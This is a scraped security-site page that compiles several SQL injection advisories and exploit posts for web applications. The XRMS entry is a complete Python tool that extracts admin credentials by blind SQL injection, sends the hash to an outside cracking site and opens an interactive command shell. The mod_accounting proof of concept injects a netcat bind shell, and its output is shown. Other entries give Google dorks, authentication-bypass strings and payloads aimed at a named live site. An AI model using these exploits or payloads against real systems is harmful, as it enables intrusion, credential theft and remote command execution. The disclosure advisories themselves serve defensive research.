MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

29 Oct 2014

Tuleap 7.4.99.5 Blind SQL Injection

Vulnerability title: Tuleap <= 7.4.99.5 Authenticated Blind SQL Injection in Enalean Tuleap
CVE: CVE-2014-7176
Vendor: Enalean
Product: Tuleap
Affected version: 7.4.99.5 and earlier
Fixed version: 7.5
Reported by: Jerzy Kramarz
 
Details:
 
An SQL injection has been found and confirmed in the software, exploitable as an authenticated user. A successful attack could allow an authenticated attacker to access information such as usernames and password hashes that are stored in the database. The following URL and parameters have been confirmed to suffer from SQL injection:
 
 
GET /plugins/docman/?group_id=100&id=16&action=search&global_txt=a<SQL Injection>&global_filtersubmit=Apply HTTP/1.1
Host: 192.168.56.108
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.56.108/plugins/docman/?group_id=100
Cookie: PHPSESSID=3pt0ombsmp0t9adujgrohv8mb6; TULEAP_session_hash=d51433e1f7c9b49079c0e5c511d64c96
Connection: keep-alive
 
 
Note: In order to exploit this vulnerability an attacker needs to be in a position to access the '/plugins/docman/' path.
 
 
Further details at:
 
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-7176/
 
Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
 
Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
 


14 Oct 2014

CMS Subkarma Cross Site Scripting / SQL Injection

# Multiple SQL Injection & XSS on CMS SUBKARMA
 
# Risk: High
 
# CWE number: CWE-89,CWE-79
 
# Date: 13/10/2014
 
# Vendor: www.jttel.com.tw
 
# Author: Felipe " Renzi " Gabriel
 
# Contact: renzi@linuxmail.org
 
# Tested on:  Linux Mint ; Firefox ; Sqlmap 1.0-dev-nongit-20140906
 
# Vulnerable Files: news.php ; product.php ; pro_con.php
 
# Exploits: http://www.target.com/news.php?id=[XSS]
 
            http://www.target.com/product.php?cat_id=[SQLI] & [XSS]
 
            http://www.target.com/pro_con.php?id=[SQLI] & [XSS]
 
 
# PoC:      http://www.cideko.com/product.php?cat_id=18  
 
            http://www.cideko.com/pro_con.php?id=3 
 
 
--- "SQLI using SQLMAP."--- 
 
    Place: GET
    Parameter: cat_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat_id=18 AND 6427=6427
 
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: cat_id=18 AND 7867=BENCHMARK(5000000,MD5(0x4d666b6e))
---
 
 
--- " XSS using HTML injection."---
 
    http://www.cideko.com/news.php?id=38"><marquee>XSS</marquee>
 
    http://www.cideko.com/product.php?cat_id=18"><marquee>XSS</marquee>
 
    http://www.cideko.com/pro_con.php?id=3"><marquee>XSS</marquee>
 
# Note
 
The SQL Injection on file pro_con.php parameter id, was published by Ali Pandidan.
Reference, http://cxsecurity.com/issue/WLB-2011020004 .
 
# Thanks


3 Oct 2014

AllMyVisitors 0.5.0 SQL Injection

AllMyVisitors0.5.0 Blind SQL Injection Vulnerability
====================================================
Author : indoushka
Vendor : http://www.php-resource.net/
Dork:    Copyright (c) 2004 by voice of web
==========================
 
SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating user input. An SQL injection occurs when a web application accepts user input that is placed directly into an SQL statement without properly filtering out dangerous characters.
 
This is one of the most common application-layer attacks currently used on the Internet. Despite the fact that it is relatively easy to protect against, a large number of web applications remain vulnerable.
This vulnerability affects /AllMyVisitors0.5.0/. 
Discovered by: Scripting (Blind_Sql_Injection.script). 
Attack details
HTTP Header input Referer was set to if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
 
Tests performed: 
if(now()=sysdate(),sleep(2),0)/*'XOR(if(now()=sysdate(),sleep(2),0))OR'"XOR(if(now()=sysdate(),sleep(2),0))OR"*/ => 6.099 s
if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/ => 18.439 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.561 s
if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=sysdate(),sleep(4),0))OR"*/ => 12.558 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.515 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.53 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.468 s
if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=sysdate(),sleep(4),0))OR"*/ => 12.496 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.577 s
 
Insecure Cookie Handling :
 
admin.php
 
javascript:document.cookie="allmyphp_cookie=' or ' 1=1--;path=/";
 
Auth Bypass :
 
admin.php
 
 Username : azerty' or '1=1--# Real admin name
 Password : demo1 ' or ' 1=1 or ADmin or  any thing


2 Oct 2014

WordPress Content Audit 1.6 Blind SQL Injection

Details
================
Software: Content Audit
Version: 1.6
Homepage: http://wordpress.org/plugins/content-audit/
Advisory report: https://security.dxw.com/advisories/blind-sqli-vulnerability-in-content-audit-could-allow-a-privileged-attacker-to-exfiltrate-password-hashes/
CVE: CVE-2014-5389
CVSS: 3.6 (Low; AV:N/AC:H/Au:S/C:P/I:N/A:P)
 
Description
================
Blind SQLi vulnerability in Content Audit could allow a privileged attacker to exfiltrate password hashes
 
Vulnerability
================
An attacker with an admin account is able to add arbitrary text in the “Audited content types” option by using a DOM inspector to modify the value of a checkbox field. This text is then inserted into an SQL query and executed as part of a daily wp-cron job.
The fact that this is run only once a day makes it rather minor. An attacker would potentially need to poll /wp-cron.php repeatedly for 24 hours until they got the first result. As blind SQL injection attacks are usually done by comparing the first character to all possible characters – one at a time, until a match is found – it would take a very long time to exfiltrate useful data.
However, we don’t discount the possibility that someone cleverer than us could figure out a more practical attack.
 
Proof of concept
================
Steps an attacker may take:
 
Visit /wp-admin/options-general.php?page=content-audit
Check an “Audited content types” checkbox
Right-click that checkbox and select “Inspect element”
Set the value attribute of the element to something which does sleep(5) if the first byte of the admin’s password hash is ‘a’ or sleep(10) otherwise
Press “Update Options”
Poll /wp-cron.php repeatedly until it takes longer than 5 seconds and record how long the request took
Repeat
 
Steps to take to verify that this issue exists:
 
Visit /wp-admin/options-general.php?page=content-audit
Check an “Audited content types” checkbox
Right-click that checkbox and select “Inspect element”
Set the value attribute of the element to “‘” (a single apostrophe)
Press “Update Options”
Add “add_action(‘init’, ‘content_audit_mark_outdated’);” to content-audit-schedule.php somewhere and load any page
This error should occur: “WordPress database error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘2013-08-12′”
If you replace “$oldposts = $wpdb->get_results” with “echo” on line 134 of content-audit-schedule.php you’ll notice that it’s inserting the ‘ unescaped – which means that you can insert whatever you like
 
 
Mitigations
================
You should update to version 1.62.
 
Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
 
Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
 
This vulnerability will be published if we do not receive a response to this report within 14 days.
 
Timeline
================
 
2014-08-11 – Discovered
2014-08-21 – Requested author email address via a contact form
2014-08-27 – Reported to author via email
2014-09-22 – No response from author; reminder sent
2014-09-23 – Author responded
2014-09-24 – Fix released
2014-10-01 – Published
 
 
 
Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.


28 Aug 2014

XRMS Blind SQL Injection / Command Execution

#######################
# XRMS Blind SQLi via $_SESSION poisoning, then command exec
#########################
 
import urllib
import urllib2
import time
import sys
 
usercharac = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','@','.','_','-','1','2','3','4','5','6','7','8','9','0']
userascii = [97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 64, 46, 95, 45, 49, 50, 51, 52, 53, 54, 55, 56, 57, 48]
def banner():
  print """      ____                                      
     / __/_  ______ _  _  ___________ ___  _____
    / /_/ / / / __ `/ | |/_/ ___/ __ `__ \/ ___/
   / __/ /_/ / /_/ / _>  </ /  / / / / / (__  ) 
  /_/  \__,_/\__, (_)_/|_/_/  /_/ /_/ /_/____/  
               /_/                              
  [+] fuq th3 w0rld, fuq ur m0m!\n"""
 
def usage():
  print "  [+] Info: Remote Command Execution via $_SESSION poisoning to SQLi to RCE"
  print "  [+] Example:"
  print "  [+] python " + sys.argv[0] + " domain.to/xrms"
  quit()
 
def sendhashaway(hash):
  print " [+] Sending hash to icrackhash.com to be cracked."
  data = None
  headers = { 'Referer' : 'http://icrackhash.com/?mdhash=' + hash + '&type=MD5','User-Agent' : 'Mozilla','X-Requested-With' : 'XMLHttpRequest'}
  url = 'http://www.icrackhash.com/?mdhash=' + hash + '&type=MD5'
  gh = urllib2.Request(url,data,headers)
  gh2 = urllib2.urlopen(gh)
  output = gh2.read()
  plaintext = getpositions(output,'<td><small><strong>','</strong>')
  print " [-] Plaintext of hash: " +plaintext + "\n"
  return plaintext
 
def username(length):
  length = length + 1
  duser = []
  #1) UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- -
  found = 0
  i = 1
  payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(SUBSTRING(username,"
  payload2 = ",1)=CHAR("
  payload3 = "),BENCHMARK(5000000,MD5(0x34343434)),NULL) FROM users-- -"
  for i in range(1,length):
    found = 0
    while(found != 1):
      for f in range(0,len(userascii)):
        class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
          def http_error_302(self, req, fp, code, msg, headers):
            infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
            infourl.status = code
            infourl.code = code
            return infourl
          http_error_300 = http_error_302    
        class HeadRequest(urllib2.Request):
          def get_method(self):
            return "POST"
        payload = payload1 + str(i) + payload2 + str(userascii[f]) + payload3
        data = urllib.urlencode([('user_id',payload)])
        url = 'http://'+domain+'/plugins/webform/new-form.php'
        opener = urllib2.build_opener(LeHTTPRedirectHandler)
        req = HeadRequest(url,data)
        prepare = opener.open(req)
        cookie1 = prepare.info()
        cookie2pos1 = str(cookie1).find('PHPSESSID')
        cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
        line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
        line = 'XRMS' + line[9:]
        url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
        headers = { 'Cookie' : line }
        data = None
        start = time.time()
        get = urllib2.Request(url,data,headers)
        get.get_method = lambda: 'HEAD'
        try:
          execute = urllib2.urlopen(get)
        except:
          pass
        elapsed = (time.time() - start)
        if(elapsed > 1):
          print "  Character found. Character is: " + usercharac[f]
          duser.append(usercharac[f])
          found = 1
  return duser
 
def getusernamelength():
  found = 0
  i = 1
  payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(LENGTH(username) = '"
  payload2 = "',BENCHMARK(50000000,MD5(0x34343434)),NULL) FROM users-- -"
  while (found != 1): 
    class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
      def http_error_302(self, req, fp, code, msg, headers):
        infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
        infourl.status = code
        infourl.code = code
        return infourl
      http_error_300 = http_error_302    
    class HeadRequest(urllib2.Request):
      def get_method(self):
        return "POST"
    payload = payload1 + str(i) + payload2
    data = urllib.urlencode([('user_id',payload)])
    url = 'http://'+domain+'/plugins/webform/new-form.php'
    opener = urllib2.build_opener(LeHTTPRedirectHandler)
    req = HeadRequest(url,data)
    prepare = opener.open(req)
    cookie1 = prepare.info()
    cookie2pos1 = str(cookie1).find('PHPSESSID')
    cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
    line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
    line = 'XRMS' + line[9:]
    url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
    headers = { 'Cookie' : line }
    data = None
    start = time.time()
    get = urllib2.Request(url,data,headers)
    get.get_method = lambda: 'HEAD'
    try:
      execute = urllib2.urlopen(get)
    except:
      pass
    elapsed = (time.time() - start)
    if(elapsed > 1):
      print "  Length found at position: " + str(i)
      found = 1
      length = i
      return length
    i = i + 1
 
def password(length):
  length = length + 1
  dpassword = []
  #1) UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- -
  found = 0
  i = 1
  payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(SUBSTRING(password,"
  payload2 = ",1)=CHAR("
  payload3 = "),BENCHMARK(5000000,MD5(0x34343434)),NULL) FROM users-- -"
  for i in range(1,length):
    found = 0
    while(found != 1):
      for f in range(0,len(userascii)):
        class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
          def http_error_302(self, req, fp, code, msg, headers):
            infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
            infourl.status = code
            infourl.code = code
            return infourl
          http_error_300 = http_error_302    
        class HeadRequest(urllib2.Request):
          def get_method(self):
            return "POST"
        payload = payload1 + str(i) + payload2 + str(userascii[f]) + payload3
        data = urllib.urlencode([('user_id',payload)])
        url = 'http://'+domain+'/plugins/webform/new-form.php'
        opener = urllib2.build_opener(LeHTTPRedirectHandler)
        req = HeadRequest(url,data)
        prepare = opener.open(req)
        cookie1 = prepare.info()
        cookie2pos1 = str(cookie1).find('PHPSESSID')
        cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
        line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
        line = 'XRMS' + line[9:]
        url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
        headers = { 'Cookie' : line }
        data = None
        start = time.time()
        get = urllib2.Request(url,data,headers)
        get.get_method = lambda: 'HEAD'
        try:
          execute = urllib2.urlopen(get)
        except:
          pass
        elapsed = (time.time() - start)
        if(elapsed > 1):
          print "  Character found. Character is: " + usercharac[f]
          dpassword.append(usercharac[f])
          found = 1
  return dpassword
 
def login(domain,user,password):
  cookie = "XRMS=iseeurgettinown4d"
  url = 'http://'+domain+'/login-2.php'
  headers = { 'Cookie' : cookie }
  data = urllib.urlencode([('username',user),('password',password)])
  a1 = urllib2.Request(url,data,headers)
  a2 = urllib2.urlopen(a1)
  output = a2.read()
  if output.find('PEAR.php') > 0:
    print "  [+] Logged In"
 
def commandexec(domain,command):
  cookie = "XRMS=iseeurgettinown4d"
  cmd = urllib.urlencode([("; echo '0x41';" + command + ";echo '14x0';",None)])
  headers = { 'Cookie' : cookie }
  data = None
  url = 'http://'+domain+'/plugins/useradmin/fingeruser.php?username=' + cmd
  b1 = urllib2.Request(url,data,headers)
  b2 = urllib2.urlopen(a1)
  output = b2.read()
  first = output.find('0x41') + 4
  last = output.find('14x0') - 4
  return output[first:last]
 
banner()
if len(sys.argv) < 2:
  usage()
domain = sys.argv[1]
print "  [+] Grabbing username length"
length = getusernamelength()
print "  [+] Grabbing username characters"
tmpuser = username(length)
adminusr = "".join(tmpuser)
print "  [+] Grabbing password hash"
tmppass =  password(32)
admpass = "".join(tmppass)
print " [+] Admin username: "+ adminusr
print "  [+] Admin password hash: " + admpass
plain = sendhashaway(admpass)
login(domain,adminusr,plain)
while(quit != 1):
  cmd = raw_input('  [+] Run a command: ')
  if cmd == 'quit':
    print "  [-] Hope you had fun :)"
    quit = 1
  if cmd != 'quit':
    print "  [+] "+ commandexec(domain,cmd)


28 Oct 2013

WordPress WP Realty Blind SQL Injection

$$$$$$\      $$\   $$\     $$$$$$\ 
$$  __$$\     $$ |  $$ |   $$  __$$\
$$ /  \__|    $$ |  $$ |   $$ /  \__|
$$ |$$$$\     $$$$$$$$ |   \$$$$$$\ 
$$ |\_$$ |    $$  __$$ |    \____$$\
$$ |  $$ |    $$ |  $$ |   $$\   $$ |
\$$$$$$  |$$\ $$ |  $$ |$$\\$$$$$$  |
 \______/ \__|\__|  \__|\__|\______/
 
# Exploit Title: Wordpress - wp-realty - MySQL Time Based Injection
# Google Dork: inurl:"/wp-content/plugins/wp-realty/"
# Vendor: http://wprealty.org/
# Date: 10/08/2013
# Exploit Author: Napsterakos
 
 
Link: http://localhost/wordpress/wp-content/plugins/wp-realty/
 
Exploit: http://localhost/wordpress/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=[SQLi]
 
 
Credits to: Greek Hacking Scene


29 Sep 2013

mod_accounting 0.5 Blind SQL Injection

   - Affected Vendor: http://sourceforge.net/projects/mod-acct/files/
   - Affected Software: mod_accounting
   - Affected Version: 0.5. Other earlier versions may be affected.
   - Issue type: Blind SQL injection
   - Release Date: 20 Sep 2013
   - Discovered by: Eldar "Wireghoul" Marcussen
   - CVE Identifier: CVE-2013-5697
   - Issue status: Abandoned software, no patch available
 
Summary
 
mod_accounting is a traffic accounting module for Apache 1.3.x which
records traffic numbers in a database. Both MySQL and PostgreSQL database
types are supported. It supports arbitrary database designs as traffic
recording is performed via a user defined query in the Apache configuration
using placeholders for received values. The following is an example
configuration:
 
<VirtualHost _default_:*>
DocumentRoot "/var/www/"
Options Indexes
AccountingQueryFmt "INSERT INTO accounting VALUES( current_time, %r, %s, '%u', '%h' );"
AccountingDatabase accounting
AccountingDatabaseDriver postgres
AccountingDBHost localhost 5432
AccountingLoginInfo acct acct
</VirtualHost>
 
As user-supplied values are not sanitised before being substituted for the
placeholders, it is possible for an attacker to supply malicious values
and perform blind SQL injection.
 
 
Description
 
The SQL injection occurs because a user-supplied HTTP header is used in
the query without sanitisation. The module uses a simple string
concatenation approach to replace the placeholders in the user-defined query
before sending it to the database. This code can be located in
mod_accounting.c:
 
409: // build the query string from the template
410: while( ptr ) {
411:     char *next;
412:
413:     next = strchr( ptr, '%' );
414:
415:     if( next ) {
416:         char       tmp[ 2 ];
417:
418:         *next++ = '\0';
419:
420:         switch( *next++ ) {
421:
422:             case 'h':
423:                 query = ap_pstrcat( p, query, ptr, cfg->ServerName ? cfg->ServerName : "-", NULL );
424:                 break;
425:
426:             case 's':
427:                 query = ap_pstrcat( p, query, ptr, sent, NULL );
428:                 break;
429:
430:             case 'r':
431:                 query = ap_pstrcat( p, query, ptr, recvd, NULL );
432:                 break;
433:
434:             case 'u':
435:                 query = ap_pstrcat( p, query, ptr, get_user( r ), NULL );
436:                 break;
437:
438:             default:
439:                 tmp[0] = next[ -1 ];
440:                 tmp[1] = '\0';
441:
442:                 query = ap_pstrcat( p, query, ptr, tmp, NULL );
443:                 break;
444:         }
445:
446:         next[ -2 ] = '%';
447:
448:     } else
449:         query = ap_pstrcat( p, query, ptr, NULL );
450:
451:     ptr = next;
452: }
453:
454: ( *DBDrivers[ cfg->DBDriver ].Query )( cfg, server, p, query );
455:
456: cfg->Received = cfg->Sent = 0;
 
It is important to note that the database query takes place after the page
has been served, hence there is no easy way to determine if a particular
injection method was successful apart from using an out of band approach.
However, as the injection occurs in an insert statement it is likely that
the successful injection vector is one of about a handful of likely
candidates.
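As an added example (not code from mod_accounting or the advisory), the following C program expands the same placeholder template as the loop above, once with the module's raw concatenation and once with the client-supplied %h and %u values quote-escaped, so a Host header containing a single quote stays inside the string literal instead of terminating it. The function and struct names and the sample values are assumptions made for this demonstration; a production fix would use the database driver's escaping routine or bound parameters rather than hand-rolled escaping.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Growable string, standing in for the pool string that ap_pstrcat builds. */
struct buf { char *s; size_t len, cap; };

static int buf_append(struct buf *b, const char *src) {
    size_t n = strlen(src);
    if (b->len + n + 1 > b->cap) {
        size_t ncap = (b->len + n + 1) * 2;
        char *t = realloc(b->s, ncap);
        if (!t) return -1;
        b->s = t;
        b->cap = ncap;
    }
    memcpy(b->s + b->len, src, n + 1);
    b->len += n;
    return 0;
}

/* Append src with every single quote doubled, the SQL-standard way to keep a
 * value inside a '...' literal. Demonstration only: a real module should call
 * the driver's routine (PQescapeStringConn, mysql_real_escape_string) or bind
 * the value as a parameter, so charset and backslash rules are handled too. */
static int buf_append_quoted(struct buf *b, const char *src) {
    for (; *src; src++) {
        char pair[3] = { *src, (*src == '\'') ? '\'' : '\0', '\0' };
        if (buf_append(b, pair)) return -1;
    }
    return 0;
}

/* Per-request values; the field names follow the module's placeholders. */
struct acct_values {
    const char *host;    /* %h: Host header value (cfg->ServerName above) */
    const char *user;    /* %u: authenticated user name, or NULL */
    unsigned long recvd; /* %r: bytes received */
    unsigned long sent;  /* %s: bytes sent */
};

/* Expand an AccountingQueryFmt template into a malloc'd query string.
 * escape == 0 reproduces the module's raw concatenation; escape != 0
 * quote-escapes the client-controlled %h and %u values. "%%" yields a
 * literal '%' and unknown letters are copied through, as in the module's
 * default branch. Returns NULL on allocation failure or a trailing '%'. */
char *expand_query(const char *fmt, const struct acct_values *v, int escape) {
    struct buf b = { NULL, 0, 0 };
    int (*put)(struct buf *, const char *) = escape ? buf_append_quoted : buf_append;
    char tmp[32];

    for (const char *p = fmt; *p; p++) {
        if (*p != '%') {
            tmp[0] = *p; tmp[1] = '\0';
            if (buf_append(&b, tmp)) goto fail;
            continue;
        }
        switch (*++p) {
        case 'h': if (put(&b, v->host ? v->host : "-")) goto fail; break;
        case 'u': if (put(&b, v->user ? v->user : "-")) goto fail; break;
        case 'r': snprintf(tmp, sizeof tmp, "%lu", v->recvd);
                  if (buf_append(&b, tmp)) goto fail; break;
        case 's': snprintf(tmp, sizeof tmp, "%lu", v->sent);
                  if (buf_append(&b, tmp)) goto fail; break;
        case '\0': goto fail;   /* dangling '%' at the end of the template */
        default:  tmp[0] = *p; tmp[1] = '\0';
                  if (buf_append(&b, tmp)) goto fail; break;
        }
    }
    if (b.s == NULL) return calloc(1, 1);   /* empty template -> "" */
    return b.s;
fail:
    free(b.s);
    return NULL;
}

int main(void) {
    const char *fmt = "INSERT INTO accounting VALUES( current_time, %r, %s, '%u', '%h' );";
    /* Constructed sample: a Host header that carries a single quote. */
    struct acct_values v = { "www.example.com'); --", "acct", 128, 512 };
    char *raw = expand_query(fmt, &v, 0);
    char *safe = expand_query(fmt, &v, 1);
    printf("raw:  %s\nsafe: %s\n", raw ? raw : "(null)", safe ? safe : "(null)");
    free(raw);
    free(safe);
    return 0;
}
```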
 
 
Impact
 
An attacker is only limited by the capabilities of the database
configuration and may be able to read, add, alter or delete data from your
database(s), read or write arbitrary files or even execute commands on the
server given a privileged database account.
 
 
Proof of Concept
 
root@bt:~/sploit-dev# cat mod_accounting-rce.pl
#!/usr/bin/perl
# PoC of blind SQL injection in the mod_accounting/0.5 Apache module
# Injection can occur via the Host header
# As the injection occurs in a user defined insert statement a bit of trial and error is required
# Database operations occur asynchronously to the page response so timing attacks won't work
# This one is completely blind
# DB can be mysql or postgres, this PoC only covers postgres
# PoC executes netcat to listen on port 4444 (requires dba privileges)
use IO::Socket::INET;
 
print "#----------------------------------------------#\n";
print "| mod_accounting/0.5 PoC exploit by \@Wireghoul |\n";
print "|          www.justanotherhacker.com           |\n";
print "#----------Command execution via SQLi----------#\n";
print "[*] Enumerating blind injection vectors:\n";
 
my @endings = ("'));", '"));', "));", "');", '");', ");", "';", '";',";");
# These should terminate most insert statements
#my @endings = ( "');" );
my $shell = 'nc -lnp 4444 -e /bin/sh';
my $cnt = 0;
my $content = "CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT; SELECT system('$shell');";
foreach $end (@endings) {
  $cnt++;
  my $sock = IO::Socket::INET->new("$ARGV[0]:$ARGV[1]") or die "Unable to connect to $ARGV[0]:$ARGV[1]: $!\n";
  my $str = "GET / HTTP/1.1\r\nHost: $ARGV[0]$cnt$end $content -- \r\n\r\n"; # from mysql.user into outfile '/tmp/pocpoc$cnt.txt'; -- \r\n\r\n";
  print "[-] Trying $end\n";
  print $sock $str;
  #print "Sent $end\n";
  close ($sock);
}
print "[*] Done, remote server should have executed $shell\n";
 
 
Execution of PoC:
--------------------------------------------------
root@bt:~/sploit-dev# nc 192.168.58.138 4444
(UNKNOWN) [192.168.58.138] 4444 (?) : Connection refused
root@bt:~/sploit-dev# perl mod_accounting-rce.pl 192.168.58.138 80
#----------------------------------------------#
| mod_accounting/0.5 PoC exploit by @Wireghoul |
|          www.justanotherhacker.com           |
#----------Command execution via SQLi----------#
[*] Enumerating blind injection vectors:
[-] Trying '));
[-] Trying "));
[-] Trying ));
[-] Trying ');
[-] Trying ");
[-] Trying );
[-] Trying ';
[-] Trying ";
[-] Trying ;
[*] Done, remote server should have executed nc -lnp 4444 -e /bin/sh
root@bt:~/sploit-dev# nc 192.168.58.138 4444
pwd
/var/lib/postgres/data/base/17142
id
uid=101(postgres) gid=104(postgres) groups=104(postgres)
hostname
sarge
^C
 
Solution
 
As the module is no longer supported, discontinue the use of this module.
 
 
Response Timeline
 
   - 03/09/2013 - Vendor notified
   - 03/09/2013 - Vendor acknowledge vulnerability
   - 04/09/2013 - Project download removed and website updated to reflect new status
   - 20/09/2013 - Advisory released


24 Sep 2013

Joomla JVideoClip Blind SQL Injection

================================================================================
Joomla Component com_jvideoclip (cid|uid|id) Blind SQL Injection / SQL Injection
================================================================================
 
Author          : SixP4ck3r
Email & msn     : SixP4ck3r@Bolivia.com
Date            : 21 Sept 2013
Critical Lvl    : Medium
Impact          : Exposure of sensitive information
Where           : From Remote
Blog            : http://sixp4ck3r.blogspot.com/
Credits         : To my love!
Dork            : inurl:com_jvideoclip
 
---------------------------------------------------------------------------
 
[Exploiting..Bug..Demo..]
 
http://example/index.php?option=com_jvideoclip&view=search&type=user&uid=[SQLi]&Itemid=6
 
[Blind SQL Injection]
http://example/index.php?option=com_jvideoclip&view=search&type=user&uid=[bSQLi]&Itemid=6
 
---------------------------------------------------------------------------
 
SixP4ck3r from Bolivia
___EOF____


29 Mar 2013

PsychoStats 3.2.2b Blind SQL Injection

Exploit Title :  PsychoStats awards.php blind SQL Injection
==============
Date: 27/03/2013 00:50
=====
Author: Mohamed from ALG
======
Vendor or Software Link:http://psychostats.us/
=======================
Version: 3.2.2b
========
Category: webapps
=========
Google Keywords: "Powered by PsychoStats 3.2.2b"
===============
contact: senderberd[at]gmail.com
========
 
exploit:
========
 
http://server/awards.php?d=YYYY-MM-DD{Inject your blind SQL injection here}
 
 
Use Havij to exploit it easily
Enjoy
 
 
S.Th To a El Koyot
 
end


24 Feb 2013

Rix4Web Portal Remote Blind SQL Injection

################################################
### Exploit Title: Rix4Web Portal Remote Blind SQL Injection Vulnerability
### Date: 02/23/2013 
### Author: L0n3ly-H34rT 
### Contact: l0n3ly_h34rt@hotmail.com 
### My Site: http://se3c.blogspot.com/ 
### Vendor Link: http://www.rix4web.com/
### Software Link: http://www.traidnt.net/vb/traidnt2230161/
### Tested on: Linux/Windows 
################################################
 
# AND time-based blind In POST:
 
POST http://127.0.0.1/rix/add-site.php?do=addnew&go=add
 
cat_id=1&dir_link=http://www.google.com/' AND SLEEP(5) AND 'test'='test&dir_short=1&dir_title=Mr.
 
# Just inject : dir_link
 
################################################
 
# Greetz To My Friendz
